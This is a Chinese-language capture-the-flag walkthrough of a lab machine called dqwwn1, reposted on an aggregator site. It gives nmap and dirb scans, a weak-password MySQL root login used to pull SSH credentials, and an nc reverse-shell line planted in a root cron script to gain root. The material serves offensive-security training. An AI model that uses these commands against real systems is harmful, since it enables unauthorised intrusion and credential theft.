dqwwn1-服务器弱点

这篇具有很好参考价值的文章主要介绍了dqwwn1-服务器弱点。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

主机发现

sudo nmap -sn 192.168.28.0/24

TCP端口扫描:sudo nmap -sT --min-rate 1000 -p- 192.168.28.34 -oA nmapscan/ports

dqwwn1-服务器弱点

TCP端口版本扫描sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.28.34 -oA nmapscan/detail

dqwwn1-服务器弱点

脆弱性扫描:sudo nmap --script=vuln -p22,80,3306 192.168.28.34 -oA nmapscan/vuln 

dqwwn1-服务器弱点

 对80开放了一个info.php页面访问是一个phpinfo的页面

对有waf,或者是有php配置文件的设置,不能直接形成攻击面,

对http服务进行访问

目录爆破

sudo dirb -u http://xxxxx   -w 字典   #并未发现有特殊的页面,通过深度挖掘发现

sudo dirb -u http://xx -X txt,php,zip,git,rar,sql,tar - w xx 

仍然什么都没有

所以只能进行暴力破解

对于mysql和ssh爆破来说,尝试mysql的暴力破解可能会更好一些,因为更有可能是弱口令和root的登录名

对mysql进行弱口令,空密码登录

sudo mysql -h 192.168.28.34 -uroot -p 

密码root/空密码

发现ssh数据表展开并查看

dqwwn1-服务器弱点

 获得ssh账户密码后登录

sudo ssh mistic@192.168.28.34

输入密码

成功getshell

权限查询

whoami  uname -a   ip a  sudo -l   

在家目录查询是否有flag

ls -liah

dqwwn1-服务器弱点

发现有一个sh脚本, 查看任务计划是什么权限运行cat /etc/crontab

dqwwn1-服务器弱点

发现是由root用户进行,我们将sh脚本写入一些反弹shell即刻提权

完善一下shell的交互性

输入clear报错

dqwwn1-服务器弱点

 export term=xterm-color

利用各种命令(nc ,ruby,python,java,go,)进行反弹shell

写入

#!/bin/bash

nc -e /bin/bash 192.168.28.29 1234 &

kali监听

nc -lvnp 1234 

成功geshell

在家目录中找flag文章来源地址https://www.toymoban.com/news/detail-432514.html

到了这里,关于dqwwn1-服务器弱点的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 云服务器CVM_云主机_云计算服务器_弹性云服务器

    腾讯云服务器CVM提供安全可靠的弹性计算服务,腾讯云明星级云服务器,弹性计算实时扩展或缩减计算资源,支持包年包月、按量计费和竞价实例计费模式,CVM提供多种CPU、内存、硬盘和带宽可以灵活调整的实例规格,提供9个9的数据可靠性,云服务器提供26个地域,多线BG

    2024年01月18日
    浏览(64)
  • 服务器主机安全如何保障

    随着互联网的快速发展,服务器主机安全问题日益凸显。服务器主机是网络世界中的核心,其安全性关乎着整个网络系统的稳定性和可靠性。 当前,服务器主机面临着多种安全威胁。其中,网络攻击是最为常见的一种。网络攻击者利用各种手段,如病毒、蠕虫、木马等恶意程

    2024年02月04日
    浏览(52)
  • 重写Nacos服务发现:多个服务器如何跨命名空间,访问公共服务?

    在开发某个公共应用时,笔者发现该公共应用的数据是所有测试环境(假设存在 dev/dev2/dev3)通用的。 这就意味着只需部署一个应用,就能满足所有测试环境的需求;也意味着所有测试环境都需要调用该公共应用,而不同测试环境的应用注册在不同的 Nacos 命名空间。 如果所

    2024年02月05日
    浏览(53)
  • 重写 Nacos 服务发现:多个服务器如何跨命名空间,访问公共服务?

    在开发某个公共应用时,笔者发现该公共应用的数据是所有测试环境(假设存在 dev/dev2/dev3)通用的。 这就意味着只需部署一个应用,就能满足所有测试环境的需求;也意味着所有测试环境都需要调用该公共应用,而不同测试环境的应用注册在不同的 Nacos 命名空间。 如果所

    2024年02月04日
    浏览(50)
  • 阿里云高性能云服务器_云主机_云服务器详解

    阿里云高性能云服务器60%单实例最大性能提升,35Gbps内网带宽,网络增强通用型云服务器、本地SSD型云服务器、大数据型云服务器、GPU异构型云服务器,阿里云百科aliyunbaike.com分享阿里云高性能云服务器: 阿里云高性能云服务器 网络增强通用型云服务器 网络增强通用型云服

    2024年02月02日
    浏览(61)
  • 云服务器CVM_云主机_云计算服务器_弹性云服务器-腾讯云

    腾讯云服务器CVM提供安全可靠的弹性计算服务,腾讯云明星级云服务器,弹性计算实时扩展或缩减计算资源,支持包年包月、按量计费和竞价实例计费模式,CVM提供多种CPU、内存、硬盘和带宽可以灵活调整的实例规格,提供9个9的数据可靠性,云服务器提供26个地域,多线BG

    2024年02月08日
    浏览(65)
  • 好意外,发现永久免费使用的云服务器

        先用Python写个Web程序 在命令行运行这个程序    保证这个80端口是打开的.  点击打开访问地址,已经是可以加载出网页了  当我们关闭IDE时,这个链接,还是可以正常访问的  

    2024年01月22日
    浏览(71)
  • linux主机搭建NFS服务器

    NFS(Network File System,网络文件系统) 它允许网络中的计算机(不同的计算机、不同的操作系统)之间通过TCP/IP网络共享资源,主要在unix系列操作系统上使用。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 NFS服务器

    2024年01月16日
    浏览(51)
  • linux服务器断电重启后,发现时间误差八小时

    客户的服务器已部署好平台,放入了机房,运行正常。服务器系统时间设置东八区( CST ),时间日期也已修改正确 客户是我省的某小县城,某台晚上,他们大楼停电断电了,包括机房(就几台机器,没做应急电源) 等来电后,服务器重启,我们的平台也通过开机自启动运行

    2024年02月06日
    浏览(61)
  • Xshell远程登录不上linux服务器,解决could not connect to 192.168.10.2 (port 22):Connection failed

    今天在用Xshell远程登录我vmware安装的一台centos7系统的虚拟机时,出现连接不上的情况 具体是这种情况: 然后在网上找了各种文章来看,这里总结一下自己的解决步骤 参考:1.解决Xshell7远程连接失败(connection failed)的问题 2.CentOS7开启SSH服务(Linux) 原因 windows没有打开ssh,

    2024年02月04日
    浏览(57)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包